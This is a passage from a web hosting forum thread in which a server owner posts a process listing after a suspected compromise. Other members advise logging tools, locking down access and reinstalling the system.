    hussain 32063 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32066 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32073 0.0 0.0 57236 8572 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32121 0.0 0.0 57504 8812 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32135 0.0 0.0 59644 10752 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32137 0.0 0.0 59644 10756 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32139 0.0 0.0 59644 10756 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32155 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    root 32222 0.0 0.0 117320 1000 ? Ss 2013 0:30 crond
    root 32258 0.0 0.0 249860 5432 ? Sl 2013 1:53 /sbin/rsyslogd
    nobody 32408 0.0 0.0 76732 4756 ? S 13:42 0:00 /usr/local/apac
    nobody 32409 0.0 0.0 76596 4664 ? S 13:42 0:00 /usr/local/apac
    hussain 32426 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32429 0.1 0.0 56116 6984 ? S 2013 45:30 /usr/sbin/httpd
    hussain 32440 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32450 0.0 0.0 57540 6516 ? S 2013 0:00 /usr/sbin/httpd
    nobody 32452 0.0 0.0 76732 4796 ? S 13:42 0:00 /usr/local/apac
    nobody 32456 0.0 0.0 76596 4716 ? S 13:42 0:00 /usr/local/apac
    nobody 32492 0.0 0.0 76596 4732 ? S 13:42 0:00 /usr/local/apac
    hussain 32610 0.8 0.0 56116 7508 ? S 2013 278:00 /usr/sbin/httpd
    hussain 32672 0.1 0.0 70412 12928 ? S 2013 42:18 /usr/sbin/httpd
    hussain 32708 0.0 0.0 71520 12896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32720 0.1 0.0 56116 7012 ? S 2013 47:39 /usr/sbin/httpd
    hussain 32744 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32750 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    root@server [~]#

  22. #22
    I don't see anything suspicious. But don't take my words for granted. There are many ways to mask process and show it as a legitimate one. I would investigate hussain account alone. Do you have some kind of auditd or snoopy? If your server was really compromised, you could check logs on your other server.
    BeltHosting.com Staff. Shared Web Hosting | Reseller Web Hosting | IRCD Hosting | psyBNC/sBNC/eggdrop/znc Hosting
    xShellz Linux Shell & IRCD Hosting.
    24/7 Live & Ticket Support

  23. #23
    StefanHost what kind of snoopy are you talking about I am little bit confused. I have only one server so how can I check on my other one ?

  24. #24
    Join Date
    Dec 2011
    Location
    Montreal
    Posts
    431
    If I was you I won't trust that system anymore. Like StefanHost said, don't take anything by granted. What I'll do fist I'll lock down server, permit access just to my ip (if is root compromised maybe they installed a backdoor, so I can't trust anymore the system) and if I have backups reinstall clean OS, cPanel or whatever you have and restore accounts from backup (if exist), or you have to hire somebody to check, and second don't post here in a public forum where anybody can read your actions.

    But this is just me.

    Regards
    George B. | ROWEBCA
    Web Hosting Services & Server Management
    Skype : rowebca

  25. #25
    Snoopy is a daemon (software) which runs in background and logs everything that happens on server, then logs are transferred to the remote server, where you can check if server was really compromised. I guess you don't have anything like that, so it's quite impossible to tell if server was really compromised or not. However, even if you don't see malicious process, that does not mean you don't have a backdoor. And that is in the most cases (if attacker knew what he was doing) impossible to remove. Your best option is to take data from hussain account (and any other account hosted with you), and then completely re-install system. (Make sure you have all data twice). Then after you're done with re-install, immediately install snoopy so you can have a peace of mind. You could lockdown server as well, what Rowebca said, permit ssh & WHM logins to only your IP, so the attacker can't make any further damage. But if malicious process is already active (masked under httpd), that won't help much. Once compromised, always compromised. Only solution is re-install.
    BeltHosting.com Staff. Shared Web Hosting | Reseller Web Hosting | IRCD Hosting | psyBNC/sBNC/eggdrop/znc Hosting
    xShellz Linux Shell & IRCD Hosting.
    24/7 Live & Ticket Support

Page 1 of 2 12 LastLast

Similar Threads

  1. urgently need help!
    By klikoo in forum Cloud Hosting
    Replies: 19
    Last Post: 01-16-2011, 12:08 AM
  2. Please help me URGENTLY
    By r9host in forum Hosting Security and Technology
    Replies: 6
    Last Post: 04-28-2010, 02:53 PM
  3. Need help urgently please
    By DonKon in forum Dedicated Server
    Replies: 2
    Last Post: 10-07-2006, 04:29 PM
  4. Need help urgently!
    By some12k in forum Web Hosting
    Replies: 13
    Last Post: 06-13-2003, 01:00 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •